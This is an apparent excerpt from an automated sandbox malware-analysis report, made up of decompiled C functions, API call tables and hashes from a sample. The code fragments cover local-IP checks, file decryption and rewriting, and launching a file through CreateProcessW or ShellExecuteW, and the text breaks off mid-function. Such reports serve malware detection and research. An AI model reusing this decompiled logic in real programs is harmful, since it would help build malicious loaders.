                                                                                                                                                                                                                                                                                    0x00409ae5
                                                                                                                                                                                                                                                                                    0x00409ae7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409afb
                                                                                                                                                                                                                                                                                    0x00409b00
                                                                                                                                                                                                                                                                                    0x00409b03
                                                                                                                                                                                                                                                                                    0x00409b05
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b05
                                                                                                                                                                                                                                                                                    0x00409a7e
                                                                                                                                                                                                                                                                                    0x00409a83
                                                                                                                                                                                                                                                                                    0x00409a86
                                                                                                                                                                                                                                                                                    0x00409a88
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409a8f
                                                                                                                                                                                                                                                                                    0x00409a9c
                                                                                                                                                                                                                                                                                    0x00409aa1
                                                                                                                                                                                                                                                                                    0x00409aa4
                                                                                                                                                                                                                                                                                    0x00409aa6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409aa6
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409770: gethostname.WS2_32(?,00000100), ref: 0040978C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409770: gethostbyname.WS2_32(?), ref: 0040979E
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A60
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A7E
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: strstr$gethostbynamegethostname
                                                                                                                                                                                                                                                                                    • String ID: .10$.10.$.127$.127.$10.$127.
                                                                                                                                                                                                                                                                                    • API String ID: 2540993189-3303897403
                                                                                                                                                                                                                                                                                    • Opcode ID: 42776ebd3e410ca7c1fc6fe8d2357f856bb71b1c556b321f1289088777c786c6
                                                                                                                                                                                                                                                                                    • Instruction ID: 3df5601b161af7dea13d6a0229968f945e0e067b118b08783a6fcb5bdca65d6d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42776ebd3e410ca7c1fc6fe8d2357f856bb71b1c556b321f1289088777c786c6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC51B4B8E043449BDB04EB61E841BAA7BB5AB44308F04C53EE904673C2D67EE951CB9D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                    			E0040BC90(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				LONG* _v16;
                                                                                                                                                                                                                                                                                    				signed char _v17;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                                                                                                                                                                                                                    				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = _a4;
                                                                                                                                                                                                                                                                                    					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                                                                                                                                                                                                                    						_v17 = 0 | _a8 != 0xffffffff;
                                                                                                                                                                                                                                                                                    						while(1 != 0) {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							EnterCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							while(_v28 <  *_v16) {
                                                                                                                                                                                                                                                                                    								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                                                                                                                                                                                                                    									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                                                                                                                                                                                                                    									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                    									_v24 =  ~_t57 + 1 + _v24;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                                    							if(_v24 !=  *_v16) {
                                                                                                                                                                                                                                                                                    								if((_v17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									L15:
                                                                                                                                                                                                                                                                                    									Sleep(1);
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t80 = _a8 - 1;
                                                                                                                                                                                                                                                                                    									_a8 = _t80;
                                                                                                                                                                                                                                                                                    									if(_t80 != 0) {
                                                                                                                                                                                                                                                                                    										goto L15;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v12 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L16:
                                                                                                                                                                                                                                                                                    				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040bca3
                                                                                                                                                                                                                                                                                    0x0040bcaf
                                                                                                                                                                                                                                                                                    0x0040bcb5
                                                                                                                                                                                                                                                                                    0x0040bcc0
                                                                                                                                                                                                                                                                                    0x0040bcc9
                                                                                                                                                                                                                                                                                    0x0040bcda
                                                                                                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                                                                                                    0x0040bcec
                                                                                                                                                                                                                                                                                    0x0040bcf9
                                                                                                                                                                                                                                                                                    0x0040bd07
                                                                                                                                                                                                                                                                                    0x0040bd0d
                                                                                                                                                                                                                                                                                    0x0040bd1f
                                                                                                                                                                                                                                                                                    0x0040bd36
                                                                                                                                                                                                                                                                                    0x0040bd52
                                                                                                                                                                                                                                                                                    0x0040bd5a
                                                                                                                                                                                                                                                                                    0x0040bd62
                                                                                                                                                                                                                                                                                    0x0040bd38
                                                                                                                                                                                                                                                                                    0x0040bd3e
                                                                                                                                                                                                                                                                                    0x0040bd3e
                                                                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                                                                    0x0040bd6e
                                                                                                                                                                                                                                                                                    0x0040bd7c
                                                                                                                                                                                                                                                                                    0x0040bd8d
                                                                                                                                                                                                                                                                                    0x0040bd9c
                                                                                                                                                                                                                                                                                    0x0040bd9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd8f
                                                                                                                                                                                                                                                                                    0x0040bd92
                                                                                                                                                                                                                                                                                    0x0040bd95
                                                                                                                                                                                                                                                                                    0x0040bd98
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd9a
                                                                                                                                                                                                                                                                                    0x0040bd98
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd7c
                                                                                                                                                                                                                                                                                    0x0040bcec
                                                                                                                                                                                                                                                                                    0x0040bcda
                                                                                                                                                                                                                                                                                    0x0040bda9
                                                                                                                                                                                                                                                                                    0x0040bdb4
                                                                                                                                                                                                                                                                                    0x0040bdc0

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BC96
                                                                                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BC9D
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(000000FE,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BCA8
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BCAF
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040BCD2
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040BD07
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040BD52
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040BD6E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040BD9E
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(0040EC84,?,0040E1CE,?,000000FF), ref: 0040BDAD
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF), ref: 0040BDB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9b630854fbef9f049a7081aae18ede4369720886b006fadf81150b85c4d4f177
                                                                                                                                                                                                                                                                                    • Instruction ID: 7471dcba010468c66186aef50ce52d9a71631389d56eaee9496ec156eb60796e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b630854fbef9f049a7081aae18ede4369720886b006fadf81150b85c4d4f177
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7414E74D00209EFDB14CFA4D848BAEBB75FF44305F20C16AE906A7380D7789A81CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409D40() {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				DWORD* _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				InitializeCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				while(_v12 < 0x200) {
                                                                                                                                                                                                                                                                                    					E00409A30( *((intOrPtr*)(0x4143b8 + _v12 * 4)), E0040BE60(), 0);
                                                                                                                                                                                                                                                                                    					_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = CreateFileW(0x416be8, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    							_v24 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							_v32 = 0;
                                                                                                                                                                                                                                                                                    							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                                                                                                                                                                                                                    								E00409A30( *((intOrPtr*)(_v20 + _v32 * 8)), E0040BE60() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                                                                                                                                                                                                                    								_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                                    								_v28 =  &(_v28[2]);
                                                                                                                                                                                                                                                                                    								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							UnmapViewOfFile(_v20);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					CloseHandle(_v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				E00409750();
                                                                                                                                                                                                                                                                                    				_t41 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    				return E0040BBA0(_t41, 0, E00409620, 0, 0, 0);
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x00409d4b
                                                                                                                                                                                                                                                                                    0x00409d51
                                                                                                                                                                                                                                                                                    0x00409d63
                                                                                                                                                                                                                                                                                    0x00409d7f
                                                                                                                                                                                                                                                                                    0x00409d84
                                                                                                                                                                                                                                                                                    0x00409d60
                                                                                                                                                                                                                                                                                    0x00409d60
                                                                                                                                                                                                                                                                                    0x00409da3
                                                                                                                                                                                                                                                                                    0x00409daa
                                                                                                                                                                                                                                                                                    0x00409dc4
                                                                                                                                                                                                                                                                                    0x00409dcb
                                                                                                                                                                                                                                                                                    0x00409de3
                                                                                                                                                                                                                                                                                    0x00409dea
                                                                                                                                                                                                                                                                                    0x00409df8
                                                                                                                                                                                                                                                                                    0x00409dfb
                                                                                                                                                                                                                                                                                    0x00409e02
                                                                                                                                                                                                                                                                                    0x00409e1d
                                                                                                                                                                                                                                                                                    0x00409e4a
                                                                                                                                                                                                                                                                                    0x00409e4f
                                                                                                                                                                                                                                                                                    0x00409e11
                                                                                                                                                                                                                                                                                    0x00409e1a
                                                                                                                                                                                                                                                                                    0x00409e1a
                                                                                                                                                                                                                                                                                    0x00409e58
                                                                                                                                                                                                                                                                                    0x00409e58
                                                                                                                                                                                                                                                                                    0x00409e62
                                                                                                                                                                                                                                                                                    0x00409e62
                                                                                                                                                                                                                                                                                    0x00409e6c
                                                                                                                                                                                                                                                                                    0x00409e6c
                                                                                                                                                                                                                                                                                    0x00409e72
                                                                                                                                                                                                                                                                                    0x00409e84
                                                                                                                                                                                                                                                                                    0x00409e95

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416DF4,?,?,?,?,?,?,00406559), ref: 00409D4B
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416BE8,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00409D9D
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00409DBE
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00409DDD
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00409DF2
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00409E58
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00409E62
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00409E6C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: NtQuerySystemTime.NTDLL ref: 0040BE6A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: RtlTimeToSecondsSince1980.NTDLL ref: 0040BE78
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                                                    • String ID: Ye@
                                                                                                                                                                                                                                                                                    • API String ID: 439099756-4068086367
                                                                                                                                                                                                                                                                                    • Opcode ID: f34f8cfc51801f30e90d44d220303d9a0f78e995387e0b56e3f657b0986bfc59
                                                                                                                                                                                                                                                                                    • Instruction ID: 4dce5e276bdf20b80a38771717a09593e8b4a8e5598cf30a42ed89e5f557a98d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f34f8cfc51801f30e90d44d220303d9a0f78e995387e0b56e3f657b0986bfc59
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4413F74E40308BBDB10DBA4DC4ABAEB774AB44704F208569F611772C2C7B96941CF9D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040D390(char _a4) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                    				struct _STARTUPINFOW _v100;
                                                                                                                                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				memset( &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                    				_v24.hProcess = 0;
                                                                                                                                                                                                                                                                                    				_v24.hThread = 0;
                                                                                                                                                                                                                                                                                    				_v24.dwProcessId = 0;
                                                                                                                                                                                                                                                                                    				_v24.dwThreadId = 0;
                                                                                                                                                                                                                                                                                    				_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                    				_v100.dwFlags = 1;
                                                                                                                                                                                                                                                                                    				_v100.wShowWindow = 5;
                                                                                                                                                                                                                                                                                    				_t11 =  &_a4; // 0x406227
                                                                                                                                                                                                                                                                                    				if(CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24) != 1) {
                                                                                                                                                                                                                                                                                    					_t12 =  &_a4; // 0x406227
                                                                                                                                                                                                                                                                                    					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					_v104 = _v8;
                                                                                                                                                                                                                                                                                    					if(_v104 <= 0x20) {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                                    0x0040d39e
                                                                                                                                                                                                                                                                                    0x0040d3a8
                                                                                                                                                                                                                                                                                    0x0040d3ab
                                                                                                                                                                                                                                                                                    0x0040d3ae
                                                                                                                                                                                                                                                                                    0x0040d3b1
                                                                                                                                                                                                                                                                                    0x0040d3b4
                                                                                                                                                                                                                                                                                    0x0040d3bb
                                                                                                                                                                                                                                                                                    0x0040d3c7
                                                                                                                                                                                                                                                                                    0x0040d3df
                                                                                                                                                                                                                                                                                    0x0040d3ee
                                                                                                                                                                                                                                                                                    0x0040d405
                                                                                                                                                                                                                                                                                    0x0040d416
                                                                                                                                                                                                                                                                                    0x0040d41c
                                                                                                                                                                                                                                                                                    0x0040d423
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d434
                                                                                                                                                                                                                                                                                    0x0040d42a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d430
                                                                                                                                                                                                                                                                                    0x0040d3f5
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040D39E
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,'b@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040D3E5
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D3F5
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,'b@,00000000,00000000,00000000), ref: 0040D410
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D42A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                                                                                                                                                                                                                    • String ID: $'b@$D$open
                                                                                                                                                                                                                                                                                    • API String ID: 2222793131-3177583149
                                                                                                                                                                                                                                                                                    • Opcode ID: d69509e6999794d924fcff9b845599a7eb41f28983b1475a5e279ebf92cb692e
                                                                                                                                                                                                                                                                                    • Instruction ID: b11808ad886c3be21141a941b9f16766042708721ad172ccf90be75e59fbd376
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d69509e6999794d924fcff9b845599a7eb41f28983b1475a5e279ebf92cb692e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E211FE71E4430CBBEB14DF94DC46BDE7774AB18700F20412AFA09BA2C0D6B55A448B59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E0040D1D0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				DWORD* _v20;
                                                                                                                                                                                                                                                                                    				char _v21;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				DWORD* _t70;
                                                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v21 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v16 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_v21 = 1;
                                                                                                                                                                                                                                                                                    							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                                                                                                                                                                                                                    							CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return _v21;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                                                    					CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v32 == 0) {
                                                                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v12 = GetFileSize(_v16, 0);
                                                                                                                                                                                                                                                                                    					if(_v12 > 0x100) {
                                                                                                                                                                                                                                                                                    						_t70 = E0040B1E0(_v32, _v32);
                                                                                                                                                                                                                                                                                    						_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                                    						_v20 = _t70;
                                                                                                                                                                                                                                                                                    						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                                                                                                                                                                                                                    							_v12 = _v20[6];
                                                                                                                                                                                                                                                                                    							_t73 = E0040AB80(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                                                                                                                                                                                                                    							_t103 = _t103 + 0x10;
                                                                                                                                                                                                                                                                                    							_v8 = _t73;
                                                                                                                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    								E004094C0(_v8, _v12,  &_v48);
                                                                                                                                                                                                                                                                                    								_t103 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                    								asm("repe cmpsd");
                                                                                                                                                                                                                                                                                    								if(0 != 0) {
                                                                                                                                                                                                                                                                                    									E00408C70(_v8);
                                                                                                                                                                                                                                                                                    									_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                                    									_v8 = 0;
                                                                                                                                                                                                                                                                                    								}
